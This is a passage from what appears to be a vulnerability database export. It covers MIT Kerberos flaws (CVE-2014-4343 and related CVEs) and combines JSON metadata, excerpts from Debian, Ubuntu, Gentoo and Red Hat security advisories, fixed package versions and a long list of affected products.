"@list" } }, "data": [ { "date": "2014-08-13T00:00:00", "db": "VULMON", "id": "CVE-2014-3508" }, { "date": "2014-08-06T00:00:00", "db": "BID", "id": "69075" }, { "date": "2015-03-13T17:11:00", "db": "PACKETSTORM", "id": "130815" }, { "date": "2014-09-15T17:53:34", "db": "PACKETSTORM", "id": "128248" }, { "date": "2015-06-29T15:35:42", "db": "PACKETSTORM", "id": "132467" }, { "date": "2014-09-25T00:05:16", "db": "PACKETSTORM", "id": "128387" }, { "date": "2014-08-08T21:44:17", "db": "PACKETSTORM", "id": "127790" }, { "date": "2016-05-26T09:22:00", "db": "PACKETSTORM", "id": "137201" }, { "date": "2014-09-03T21:23:53", "db": "PACKETSTORM", "id": "128131" }, { "date": "2014-08-11T11:11:00", "db": "PACKETSTORM", "id": "127811" }, { "date": "2014-08-13T23:55:07.497000", "db": "NVD", "id": "CVE-2014-3508" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2017-11-15T00:00:00", "db": "VULMON", "id": "CVE-2014-3508" }, { "date": "2016-09-09T15:00:00", "db": "BID", "id": "69075" }, { "date": "2023-11-07T02:20:10.163000", "db": "NVD", "id": "CVE-2014-3508" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "network", "sources": [ { "db": "BID", "id": "69075" } ], "trust": 0.3 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "OpenSSL CVE-2014-3508 Information Disclosure Vulnerability", "sources": [ { "db": "BID", "id": "69075" } ], "trust": 0.3 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Design Error", "sources": [ { "db": "BID", "id": "69075" } ], "trust": 0.3 } }
var-201407-0461
Vulnerability from variot
MIT Kerberos 5 (aka krb5) before 1.12.2 allows remote attackers to cause a denial of service (buffer over-read and application crash) by injecting invalid tokens into a GSSAPI application session. MIT Kerberos 5 is prone to a remote denial-of-service vulnerability. Attackers can exploit this issue to cause a program to crash, resulting in denial-of-service conditions. Versions prior to Kerberos 1.12.2 are vulnerable.
CVE-2014-4343
An unauthenticated remote attacker with the ability to spoof packets
appearing to be from a GSSAPI acceptor can cause a double-free
condition in GSSAPI initiators (clients) which are using the SPNEGO
mechanism, by returning a different underlying mechanism than was
proposed by the initiator.
CVE-2014-4344
An unauthenticated or partially authenticated remote attacker can
cause a NULL dereference and application crash during a SPNEGO
negotiation by sending an empty token as the second or later context
token from initiator to acceptor.
For the stable distribution (wheezy), these problems have been fixed in version 1.10.1+dfsg-5+deb7u2.
For the unstable distribution (sid), these problems have been fixed in version 1.12.1+dfsg-7. ========================================================================== Ubuntu Security Notice USN-2310-1 August 11, 2014
krb5 vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
- Ubuntu 10.04 LTS
Summary:
Several security issues were fixed in Kerberos. This issue only affected Ubuntu 12.04 LTS. This issue only affected Ubuntu 10.04 LTS and Ubuntu 12.04 LTS. This issue only affected Ubuntu 10.04 LTS and Ubuntu 12.04 LTS. This issue only affected Ubuntu 10.04 LTS and Ubuntu 12.04 LTS. (CVE-2014-4344)
Tomas Kuthan and Greg Hudson discovered that the Kerberos kadmind daemon incorrectly handled buffers when used with the LDAP backend. (CVE-2014-4345)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 14.04 LTS: krb5-admin-server 1.12+dfsg-2ubuntu4.2 krb5-kdc 1.12+dfsg-2ubuntu4.2 krb5-kdc-ldap 1.12+dfsg-2ubuntu4.2 krb5-otp 1.12+dfsg-2ubuntu4.2 krb5-pkinit 1.12+dfsg-2ubuntu4.2 krb5-user 1.12+dfsg-2ubuntu4.2 libgssapi-krb5-2 1.12+dfsg-2ubuntu4.2 libgssrpc4 1.12+dfsg-2ubuntu4.2 libk5crypto3 1.12+dfsg-2ubuntu4.2 libkadm5clnt-mit9 1.12+dfsg-2ubuntu4.2 libkadm5srv-mit9 1.12+dfsg-2ubuntu4.2 libkdb5-7 1.12+dfsg-2ubuntu4.2 libkrad0 1.12+dfsg-2ubuntu4.2 libkrb5-3 1.12+dfsg-2ubuntu4.2 libkrb5support0 1.12+dfsg-2ubuntu4.2
Ubuntu 12.04 LTS: krb5-admin-server 1.10+dfsg~beta1-2ubuntu0.5 krb5-kdc 1.10+dfsg~beta1-2ubuntu0.5 krb5-kdc-ldap 1.10+dfsg~beta1-2ubuntu0.5 krb5-pkinit 1.10+dfsg~beta1-2ubuntu0.5 krb5-user 1.10+dfsg~beta1-2ubuntu0.5 libgssapi-krb5-2 1.10+dfsg~beta1-2ubuntu0.5 libgssrpc4 1.10+dfsg~beta1-2ubuntu0.5 libk5crypto3 1.10+dfsg~beta1-2ubuntu0.5 libkadm5clnt-mit8 1.10+dfsg~beta1-2ubuntu0.5 libkadm5srv-mit8 1.10+dfsg~beta1-2ubuntu0.5 libkdb5-6 1.10+dfsg~beta1-2ubuntu0.5 libkrb5-3 1.10+dfsg~beta1-2ubuntu0.5 libkrb5support0 1.10+dfsg~beta1-2ubuntu0.5
Ubuntu 10.04 LTS: krb5-admin-server 1.8.1+dfsg-2ubuntu0.13 krb5-kdc 1.8.1+dfsg-2ubuntu0.13 krb5-kdc-ldap 1.8.1+dfsg-2ubuntu0.13 krb5-pkinit 1.8.1+dfsg-2ubuntu0.13 krb5-user 1.8.1+dfsg-2ubuntu0.13 libgssapi-krb5-2 1.8.1+dfsg-2ubuntu0.13 libgssrpc4 1.8.1+dfsg-2ubuntu0.13 libk5crypto3 1.8.1+dfsg-2ubuntu0.13 libkadm5clnt-mit7 1.8.1+dfsg-2ubuntu0.13 libkadm5srv-mit7 1.8.1+dfsg-2ubuntu0.13 libkdb5-4 1.8.1+dfsg-2ubuntu0.13 libkrb5-3 1.8.1+dfsg-2ubuntu0.13 libkrb5support0 1.8.1+dfsg-2ubuntu0.13
In general, a standard system update will make all the necessary changes. The verification of md5 checksums and GPG signatures is performed automatically for you.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 app-crypt/mit-krb5 < 1.13 >= 1.13
Description
Multiple vulnerabilities have been discovered in MIT Kerberos 5. Please review the CVE identifiers referenced below for details.
Workaround
There is no known workaround at this time.
Resolution
All MIT Kerberos 5 users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=app-crypt/mit-krb5-1.13"
References
[ 1 ] CVE-2014-4341 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4341 [ 2 ] CVE-2014-4343 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4343 [ 3 ] CVE-2014-4345 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4345 [ 4 ] CVE-2014-5351 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-5351
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201412-53.xml
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2014 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. (CVE-2014-4341)
This update also fixes the following bugs:
-
Prior to this update, the libkrb5 library occasionally attempted to free already freed memory when encrypting credentials. As a consequence, the calling process terminated unexpectedly with a segmentation fault. With this update, libkrb5 frees memory correctly, which allows the credentials to be encrypted appropriately and thus prevents the mentioned crash. (BZ#1004632)
-
Previously, when the krb5 client library was waiting for a response from a server, the timeout variable in certain cases became a negative number. Consequently, the client could enter a loop while checking for responses. With this update, the client logic has been modified and the described error no longer occurs. After installing the updated packages, the krb5kdc daemon will be restarted automatically. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Moderate: krb5 security, bug fix and enhancement update Advisory ID: RHSA-2015:0439-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-0439.html Issue date: 2015-03-05 CVE Names: CVE-2014-4341 CVE-2014-4342 CVE-2014-4343 CVE-2014-4344 CVE-2014-4345 CVE-2014-5352 CVE-2014-5353 CVE-2014-9421 CVE-2014-9422 CVE-2014-9423 =====================================================================
- Summary:
Updated krb5 packages that fix multiple security issues, several bugs, and add various enhancements are now available for Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.
Kerberos is a networked authentication system which allows clients and servers to authenticate to each other with the help of a trusted third party, the Kerberos KDC.
- Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Server (v. 7) - ppc64, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64
- Description:
A NULL pointer dereference flaw was found in the MIT Kerberos SPNEGO acceptor for continuation tokens. A remote, unauthenticated attacker could use this flaw to crash a GSSAPI-enabled server application. (CVE-2014-4344)
A buffer overflow was found in the KADM5 administration server (kadmind) when it was used with an LDAP back end for the KDC database. A remote, authenticated attacker could potentially use this flaw to execute arbitrary code on the system running kadmind. (CVE-2014-4345)
A use-after-free flaw was found in the way the MIT Kerberos libgssapi_krb5 library processed valid context deletion tokens. An attacker able to make an application using the GSS-API library (libgssapi) call the gss_process_context_token() function could use this flaw to crash that application. (CVE-2014-5352)
If kadmind were used with an LDAP back end for the KDC database, a remote, authenticated attacker with the permissions to set the password policy could crash kadmind by attempting to use a named ticket policy object as a password policy for a principal. (CVE-2014-5353)
A double-free flaw was found in the way MIT Kerberos handled invalid External Data Representation (XDR) data. An authenticated user could use this flaw to crash the MIT Kerberos administration server (kadmind), or other applications using Kerberos libraries, using specially crafted XDR packets. (CVE-2014-9421)
It was found that the MIT Kerberos administration server (kadmind) incorrectly accepted certain authentication requests for two-component server principal names. A remote attacker able to acquire a key with a particularly named principal (such as "kad/x") could use this flaw to impersonate any user to kadmind, and perform administrative actions as that user. (CVE-2014-9422)
An information disclosure flaw was found in the way MIT Kerberos RPCSEC_GSS implementation (libgssrpc) handled certain requests. An attacker could send a specially crafted request to an application using libgssrpc to disclose a limited portion of uninitialized memory used by that application. (CVE-2014-9423)
Two buffer over-read flaws were found in the way MIT Kerberos handled certain requests. A remote, unauthenticated attacker able to inject packets into a client or server application's GSSAPI session could use either of these flaws to crash the application. An attacker able to spoof packets to appear as though they are from an GSSAPI acceptor could use this flaw to crash a client application that uses MIT Kerberos. (CVE-2014-4343)
Red Hat would like to thank the MIT Kerberos project for reporting the CVE-2014-5352, CVE-2014-9421, CVE-2014-9422, and CVE-2014-9423 issues. MIT Kerberos project acknowledges Nico Williams for helping with the analysis of CVE-2014-5352.
The krb5 packages have been upgraded to upstream version 1.12, which provides a number of bug fixes and enhancements, including:
-
Added plug-in interfaces for principal-to-username mapping and verifying authorization to user accounts.
-
When communicating with a KDC over a connected TCP or HTTPS socket, the client gives the KDC more time to reply before it transmits the request to another server. (BZ#1049709, BZ#1127995)
This update also fixes multiple bugs, for example:
- The Kerberos client library did not recognize certain exit statuses that the resolver libraries could return when looking up the addresses of servers configured in the /etc/krb5.conf file or locating Kerberos servers using DNS service location. The library could treat non-fatal return codes as fatal errors. Now, the library interprets the specific return codes correctly. (BZ#1084068, BZ#1109102)
In addition, this update adds various enhancements. Among others:
-
Added support for contacting KDCs and kpasswd servers through HTTPS proxies implementing the Kerberos KDC Proxy (KKDCP) protocol. (BZ#1109919)
-
Solution:
All krb5 users are advised to upgrade to these updated packages, which correct these issues and add these enhancements.
Before applying this update, make sure all previously released errata relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1084068 - ipv6 address handling in krb5.conf 1102837 - Please backport improved GSSAPI mech configuration 1109102 - Kerberos does not handle incorrect Active Directory DNS SRV entries correctly 1109919 - Backport https support into libkrb5 1116180 - CVE-2014-4341 krb5: denial of service flaws when handling padding length longer than the plaintext 1118347 - ksu non-functional, gets invalid argument copying cred cache 1120581 - CVE-2014-4342 krb5: denial of service flaws when handling RFC 1964 tokens 1121789 - CVE-2014-4343: use-after-free crash in SPNEGO 1121876 - CVE-2014-4343 krb5: double-free flaw in SPNEGO initiators 1121877 - CVE-2014-4344 krb5: NULL pointer dereference flaw in SPNEGO acceptor for continuation tokens 1127995 - aggressive kinit timeout causes AS_REQ resent and subsequent OTP auth failure 1128157 - CVE-2014-4345 krb5: buffer overrun in kadmind with LDAP backend (MITKRB5-SA-2014-001) 1166012 - libkadmclnt SONAME change (8 to 9) in krb5 1.12 update 1174543 - CVE-2014-5353 krb5: NULL pointer dereference when using a ticket policy name as a password policy name 1179856 - CVE-2014-5352 krb5: gss_process_context_token() incorrectly frees context (MITKRB5-SA-2015-001) 1179857 - CVE-2014-9421 krb5: kadmind doubly frees partial deserialization results (MITKRB5-SA-2015-001) 1179861 - CVE-2014-9422 krb5: kadmind incorrectly validates server principal name (MITKRB5-SA-2015-001) 1179863 - CVE-2014-9423 krb5: libgssrpc server applications leak uninitialized bytes (MITKRB5-SA-2015-001) 1184629 - kinit loops on principals on unknown error
- Package List:
Red Hat Enterprise Linux Client (v. 7):
Source: krb5-1.12.2-14.el7.src.rpm
x86_64: krb5-debuginfo-1.12.2-14.el7.i686.rpm krb5-debuginfo-1.12.2-14.el7.x86_64.rpm krb5-libs-1.12.2-14.el7.i686.rpm krb5-libs-1.12.2-14.el7.x86_64.rpm krb5-pkinit-1.12.2-14.el7.x86_64.rpm krb5-workstation-1.12.2-14.el7.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64: krb5-debuginfo-1.12.2-14.el7.i686.rpm krb5-debuginfo-1.12.2-14.el7.x86_64.rpm krb5-devel-1.12.2-14.el7.i686.rpm krb5-devel-1.12.2-14.el7.x86_64.rpm krb5-server-1.12.2-14.el7.x86_64.rpm krb5-server-ldap-1.12.2-14.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source: krb5-1.12.2-14.el7.src.rpm
x86_64: krb5-debuginfo-1.12.2-14.el7.i686.rpm krb5-debuginfo-1.12.2-14.el7.x86_64.rpm krb5-libs-1.12.2-14.el7.i686.rpm krb5-libs-1.12.2-14.el7.x86_64.rpm krb5-pkinit-1.12.2-14.el7.x86_64.rpm krb5-workstation-1.12.2-14.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64: krb5-debuginfo-1.12.2-14.el7.i686.rpm krb5-debuginfo-1.12.2-14.el7.x86_64.rpm krb5-devel-1.12.2-14.el7.i686.rpm krb5-devel-1.12.2-14.el7.x86_64.rpm krb5-server-1.12.2-14.el7.x86_64.rpm krb5-server-ldap-1.12.2-14.el7.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: krb5-1.12.2-14.el7.src.rpm
ppc64: krb5-debuginfo-1.12.2-14.el7.ppc.rpm krb5-debuginfo-1.12.2-14.el7.ppc64.rpm krb5-devel-1.12.2-14.el7.ppc.rpm krb5-devel-1.12.2-14.el7.ppc64.rpm krb5-libs-1.12.2-14.el7.ppc.rpm krb5-libs-1.12.2-14.el7.ppc64.rpm krb5-pkinit-1.12.2-14.el7.ppc64.rpm krb5-server-1.12.2-14.el7.ppc64.rpm krb5-server-ldap-1.12.2-14.el7.ppc64.rpm krb5-workstation-1.12.2-14.el7.ppc64.rpm
s390x: krb5-debuginfo-1.12.2-14.el7.s390.rpm krb5-debuginfo-1.12.2-14.el7.s390x.rpm krb5-devel-1.12.2-14.el7.s390.rpm krb5-devel-1.12.2-14.el7.s390x.rpm krb5-libs-1.12.2-14.el7.s390.rpm krb5-libs-1.12.2-14.el7.s390x.rpm krb5-pkinit-1.12.2-14.el7.s390x.rpm krb5-server-1.12.2-14.el7.s390x.rpm krb5-server-ldap-1.12.2-14.el7.s390x.rpm krb5-workstation-1.12.2-14.el7.s390x.rpm
x86_64: krb5-debuginfo-1.12.2-14.el7.i686.rpm krb5-debuginfo-1.12.2-14.el7.x86_64.rpm krb5-devel-1.12.2-14.el7.i686.rpm krb5-devel-1.12.2-14.el7.x86_64.rpm krb5-libs-1.12.2-14.el7.i686.rpm krb5-libs-1.12.2-14.el7.x86_64.rpm krb5-pkinit-1.12.2-14.el7.x86_64.rpm krb5-server-1.12.2-14.el7.x86_64.rpm krb5-server-ldap-1.12.2-14.el7.x86_64.rpm krb5-workstation-1.12.2-14.el7.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: krb5-1.12.2-14.el7.src.rpm
x86_64: krb5-debuginfo-1.12.2-14.el7.i686.rpm krb5-debuginfo-1.12.2-14.el7.x86_64.rpm krb5-devel-1.12.2-14.el7.i686.rpm krb5-devel-1.12.2-14.el7.x86_64.rpm krb5-libs-1.12.2-14.el7.i686.rpm krb5-libs-1.12.2-14.el7.x86_64.rpm krb5-pkinit-1.12.2-14.el7.x86_64.rpm krb5-server-1.12.2-14.el7.x86_64.rpm krb5-server-ldap-1.12.2-14.el7.x86_64.rpm krb5-workstation-1.12.2-14.el7.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2014-4341 https://access.redhat.com/security/cve/CVE-2014-4342 https://access.redhat.com/security/cve/CVE-2014-4343 https://access.redhat.com/security/cve/CVE-2014-4344 https://access.redhat.com/security/cve/CVE-2014-4345 https://access.redhat.com/security/cve/CVE-2014-5352 https://access.redhat.com/security/cve/CVE-2014-5353 https://access.redhat.com/security/cve/CVE-2014-9421 https://access.redhat.com/security/cve/CVE-2014-9422 https://access.redhat.com/security/cve/CVE-2014-9423 https://access.redhat.com/security/updates/classification/#moderate
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2015 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iD8DBQFU+GoxXlSAg2UNWIIRAtkZAJ9PYyHLsR1t+YWgqw4jb4XTtX8iuACgkxfi gZD8EL2lSaLXnIQxca8zLTg= =aK0y -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . 6) - i386, x86_64
It was found that if a KDC served multiple realms, certain requests could cause the setup_server_realm() function to dereference a NULL pointer. (CVE-2014-4343)
These updated krb5 packages also include several bug fixes. Space precludes documenting all of these changes in this advisory. Users are directed to the Red Hat Enterprise Linux 6.6 Technical Notes, linked to in the References section, for information on the most significant of these changes
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201407-0461", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "enterprise linux workstation", "scope": "eq", "trust": 1.6, "vendor": "redhat", "version": "7.0" }, { "model": "enterprise linux eus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.6" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "debian", "version": "7.0" }, { "model": "fedora", "scope": "eq", "trust": 1.0, "vendor": "fedoraproject", "version": "20" }, { "model": "enterprise linux server eus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.4" }, { "model": "enterprise linux eus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.4" }, { "model": "enterprise linux server aus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.6" }, { "model": "enterprise linux server eus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.7" }, { "model": "enterprise linux eus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.7" }, { "model": "enterprise linux tus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.6" }, { "model": "enterprise linux server aus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.4" }, { "model": "enterprise linux server", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.0" }, { "model": "enterprise linux eus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.3" }, { "model": "enterprise linux server eus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.3" }, { "model": "enterprise linux server aus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.7" }, { "model": "enterprise linux server aus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.3" }, { "model": "enterprise linux tus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.7" }, { "model": "enterprise linux eus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.5" }, { "model": "kerberos 5", "scope": "lt", "trust": 1.0, "vendor": "mit", "version": "1.12.2" }, { "model": "enterprise linux tus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.3" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.0" }, { "model": "enterprise linux server eus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.6" }, { "model": "kerberos", "scope": "lt", "trust": 0.8, "vendor": "mit kerberos", "version": "5 1.12" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.6, "vendor": "redhat", "version": "7.0" }, { "model": "aura collaboration environment", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "3.0" }, { "model": "big-ip wom hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "big-ip aam", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "big-ip gtm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "big-ip apm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "big-ip webaccelerator hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "big-ip gtm hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1" }, { "model": "big-ip link controller hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "one-x client enablement services sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "big-iq device", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.2" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.0" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "big-ip asm hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.3" }, { "model": "big-ip edge gateway hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "big-ip apm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.3" }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "aura system platform sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "big-ip ltm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip psm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.2" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.1" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.4" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "big-ip apm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "aura application server sip core", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53002.0" }, { "model": "big-ip ltm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "big-ip webaccelerator hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.0" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.3.0.3" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.0" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", 